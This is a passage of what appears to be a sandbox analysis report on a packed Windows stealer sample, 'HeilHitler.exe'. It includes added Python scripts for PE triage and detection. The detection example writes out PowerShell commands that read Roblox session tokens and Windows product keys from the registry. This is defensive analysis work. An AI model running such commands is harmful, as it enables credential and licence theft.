              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66F54 push r8; ret 1_2_00007FFDFAD66F5C
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66F32 push r12; ret 1_2_00007FFDFAD66F4A
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD68EFE push r12; ret 1_2_00007FFDFAD68F25
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66ED0 push r12; ret 1_2_00007FFDFAD66EEE
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66EB6 push r10; retf 1_2_00007FFDFAD66EB9
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66E8C push rsp; iretd 1_2_00007FFDFAD66E8D
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66E9B push rsi; ret 1_2_00007FFDFAD66E9C
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD68E66 push rbp; iretq 1_2_00007FFDFAD68E67
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD677EA push rsi; ret 1_2_00007FFDFAD67821
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66F8D push r10; ret 1_2_00007FFDFAD66FA0
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD6855C push rbp; retf 1_2_00007FFDFAD68575
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66CEA push rdx; ret 1_2_00007FFDFAD66CF1
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66CF6 push r12; ret 1_2_00007FFDFAD66CF8
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66CCC push r8; ret 1_2_00007FFDFAD66CD9
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD6A4A9 push rdx; ret 1_2_00007FFDFAD6A500
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66E44 push rdi; iretd 1_2_00007FFDFAD66E46
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66DFB push rsp; ret 1_2_00007FFDFAD66E03
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD685A7 push r12; ret 1_2_00007FFDFAD685E3
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD69D85 push rsp; iretq 1_2_00007FFDFAD69D86
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9AB7D2A5 pushad ; iretd 7_2_00007FFD9AB7D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9AC900BD pushad ; iretd 7_2_00007FFD9AC900C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9AC9861D push ebx; ret 7_2_00007FFD9AC9862A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9AD69266 push esi; ret 7_2_00007FFD9AD69267
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 38_2_00007FFD9ACB00BD pushad ; iretd 38_2_00007FFD9ACB00C1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              (this UPX0/UPX1 pair is reported 16 times)
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\libcrypto-1_1.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\select.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\sqlite3.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\_queue.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\unicodedata.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\libffi-7.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\_decimal.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\_socket.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\_ctypes.pyd
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\python310.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\libssl-1_1.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322\_sqlite3.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.dll
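
A static triage of the PE properties reported in this group (the CheckSum field against the value the PE checksum algorithm yields, UPX0/UPX1 section names, and a TimeDateStamp that lies in the future), as an added example; it is not code from this report or from Joe Sandbox. It uses only the Python standard library, and the image it inspects is constructed inline (a header-only PE32+ carrying the report's 0x8E79CD85 timestamp and UPX section names), not the analysed sample. Two caveats belong with these indicators: 0x140000000 is the default image base for 64-bit executables, and a zero CheckSum is routine for unsigned builds, so neither is suspicious alone; the combination with UPX sections, a 2045 link date and a dozen dropped binaries with zeroed checksums is what makes this drop set stand out.

```python
"""Static PE triage for the indicators the report lists: stored vs. computed CheckSum,
UPX section names, and an IMAGE_FILE_HEADER.TimeDateStamp that lies in the future.
Added example; not code from the report or from Joe Sandbox. Standard library only."""
import struct
import time
from datetime import datetime, timezone
from typing import List, Optional

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE/COFF CheckSum: sum the file as little-endian 32-bit words with carry folding,
    treating the CheckSum field itself as zero, fold to 16 bits, then add the file length.
    Assumes checksum_offset is 4-byte aligned (true whenever e_lfanew is aligned)."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Read just the header fields the triage needs; raises ValueError on a non-PE file."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    machine, nsections, timestamp = struct.unpack_from("<HHI", data, fh)
    size_of_opt = struct.unpack_from("<H", data, fh + 16)[0]
    oh = fh + 20                                        # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, oh)[0]
    if magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", data, oh + 24)[0]
    elif magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", data, oh + 28)[0]  # BaseOfData precedes it
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    checksum_offset = oh + 64                           # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        start = oh + size_of_opt + i * 40               # IMAGE_SECTION_HEADER, Name first
        sections.append(data[start:start + 8].rstrip(b"\0").decode("ascii", "replace"))
    return {"machine": machine, "timestamp": timestamp, "image_base": image_base,
            "stored_checksum": struct.unpack_from("<I", data, checksum_offset)[0],
            "checksum_offset": checksum_offset, "sections": sections}


def triage(data: bytes, now: Optional[float] = None) -> dict:
    """Return the parsed fields plus the findings an analyst would flag."""
    info = parse_pe(data)
    now = time.time() if now is None else now
    computed = pe_checksum(data, info["checksum_offset"])
    findings = []
    if info["stored_checksum"] == 0:
        findings.append("checksum field is 0 (unsigned build, or header rewritten by a "
                        "packer); computed value would be 0x%x" % computed)
    elif info["stored_checksum"] != computed:
        findings.append("checksum mismatch: stored 0x%x, computed 0x%x"
                        % (info["stored_checksum"], computed))
    upx = [s for s in info["sections"] if s.upper().startswith("UPX")]
    if upx:
        findings.append("UPX section names present: " + ", ".join(upx))
    if info["timestamp"] > now:
        when = datetime.fromtimestamp(info["timestamp"], timezone.utc)
        findings.append("link timestamp in the future: " + when.strftime("%Y-%m-%d %H:%M:%S UTC"))
    return {**info, "computed_checksum": computed, "findings": findings}


def patch_checksum(data: bytes, value: int) -> bytes:
    """Write a CheckSum into the header, as a linker does for release builds."""
    out = bytearray(data)
    struct.pack_into("<I", out, parse_pe(data)["checksum_offset"], value)
    return bytes(out)


def build_sample(timestamp: int, sections: List[str], stored_checksum: int = 0) -> bytes:
    """Constructed input: a header-only PE32+ image (not loadable, not the report's
    sample) carrying only the fields the triage inspects."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    file_header = struct.pack("<HHIIIHH", 0x8664, len(sections), timestamp, 0, 0, 240, 0x22)
    opt = bytearray(240)                                           # PE32+ optional header
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<Q", opt, 24, 0x140000000)                   # default x64 image base
    struct.pack_into("<I", opt, 64, stored_checksum)
    headers = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in sections)
    body = bytes(range(256)) * 2                                   # filler in place of section data
    return dos + b"PE\0\0" + file_header + bytes(opt) + headers + body


if __name__ == "__main__":
    sample = build_sample(0x8E79CD85, ["UPX0", "UPX1", ".rsrc"])   # timestamp from the report
    for line in triage(sample)["findings"]:
        print("-", line)
```

Run against a real dropped file by replacing the constructed image with `open(path, "rb").read()`; the same three checks reproduce the "real checksum ... should be", "section name: UPX0" and "[... 2045 UTC]" lines above, and writing the computed value back with `patch_checksum` is a quick way to confirm the algorithm agrees with itself on a file whose header you have not otherwise changed.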
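
A detection pass over the process-creation and file-creation telemetry that the signatures in this group describe, as an added example; it is not Joe Sandbox code and not part of the report. It encodes three of the behaviours flagged above: PowerShell reading credential-bearing registry values (.ROBLOSECURITY, BackupProductKeyDefault) while ignoring fingerprinting reads such as PROCESSOR_IDENTIFIER, csc.exe compiling a .cmdline out of %TEMP% (the "Dot net compiler compiles file from suspicious location" Sigma hit), and an .exe written into a PyInstaller _MEI extraction directory (rar.exe here). The event records are constructed: PIDs, parent links and the record shape are assumptions, while the command lines and paths are the ones listed above. Each alert carries its parent chain so the analyst sees the launcher rather than only the leaf process.

```python
"""Detection over process-creation and file-create events modelled on the report's
signatures. Added example; not Joe Sandbox code. PIDs and event shape are constructed;
command lines and paths are the ones the report lists."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class FileEvent:
    pid: int          # process that wrote the file
    path: str


# Value names whose contents are credentials or licence material. Reading them from a
# one-line PowerShell call is a stealer pattern; hardware identifiers such as
# PROCESSOR_IDENTIFIER, which the same sample also reads, are fingerprinting, not theft.
SECRET_VALUE_NAMES = {".roblosecurity", "backupproductkeydefault"}

RE_GET_ITEMPROP = re.compile(r"Get-ItemPropertyValue\b.*?-Name\s+(\S+)", re.IGNORECASE)
RE_CSC_TEMP = re.compile(
    r'@"?[A-Za-z]:\\Users\\[^"\\]+\\AppData\\Local\\Temp\\[^"]*\.cmdline"?', re.IGNORECASE)
RE_MEI_EXE = re.compile(r"\\Temp\\_MEI\d+\\[^\\]+\.exe$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, procs: Dict[int, ProcEvent]) -> List[str]:
    """Walk ppid links back to the root so an alert carries its launch chain."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(basename(procs[pid].image))
        pid = procs[pid].ppid
    return chain[::-1]


def detect(proc_events: List[ProcEvent], file_events: List[FileEvent]) -> List[dict]:
    procs = {e.pid: e for e in proc_events}
    alerts = []
    for e in proc_events:
        name = basename(e.image)
        if name == "powershell.exe":
            m = RE_GET_ITEMPROP.search(e.cmdline)
            if m and m.group(1).strip("'\"").lower() in SECRET_VALUE_NAMES:
                alerts.append({"rule": "powershell_reads_secret_registry_value",
                               "pid": e.pid, "value": m.group(1),
                               "chain": ancestry(e.pid, procs)})
        elif name == "csc.exe" and RE_CSC_TEMP.search(e.cmdline):
            alerts.append({"rule": "csc_compiles_from_temp", "pid": e.pid,
                           "chain": ancestry(e.pid, procs)})
    for f in file_events:
        if RE_MEI_EXE.search(f.path):
            alerts.append({"rule": "exe_dropped_into_pyinstaller_dir", "pid": f.pid,
                           "path": f.path, "chain": ancestry(f.pid, procs)})
    return alerts


# Constructed telemetry: PIDs and parent links are assumed; strings come from the report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
SAMPLE_PROCS = [
    ProcEvent(100, 1, r"C:\Users\user\Desktop\HeilHitler.exe", "HeilHitler.exe"),
    ProcEvent(101, 100, r"C:\Users\user\Desktop\HeilHitler.exe", "HeilHitler.exe"),  # PyInstaller child
    ProcEvent(200, 101, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(300, 200, PS, r"powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"),
    ProcEvent(301, 200, PS, r"powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"),
    ProcEvent(302, 200, PS, r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"),
    ProcEvent(400, 302, CSC, r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"'),
]
SAMPLE_FILES = [
    FileEvent(100, r"C:\Users\user\AppData\Local\Temp\_MEI74322\python310.dll"),
    FileEvent(100, r"C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_PROCS, SAMPLE_FILES):
        print(alert["rule"], "pid", alert["pid"], "via", " -> ".join(alert["chain"]))
```

The chain is what turns these into triage-ready alerts: a csc.exe hit on its own is common on developer machines, but csc.exe under powershell.exe under cmd.exe under a PyInstaller-packed binary on the user's Desktop is the shape of this sample, and the same ancestry lookup applies to the rar.exe drop and to the registry reads.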

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (reported 8 times)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (reported 6 times)
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D65830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF633D65830
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8671
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1103
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3163
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4300
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1346
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3813
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 409
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2502
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1692
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\select.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_queue.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\unicodedata.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_decimal.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_socket.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_ctypes.pyd
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\python310.dll
Source: C:\Users\user\Desktop\HeilHitler.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_sqlite3.pyd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.dll
              Source: C:\Users\user\Desktop\HeilHitler.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17221
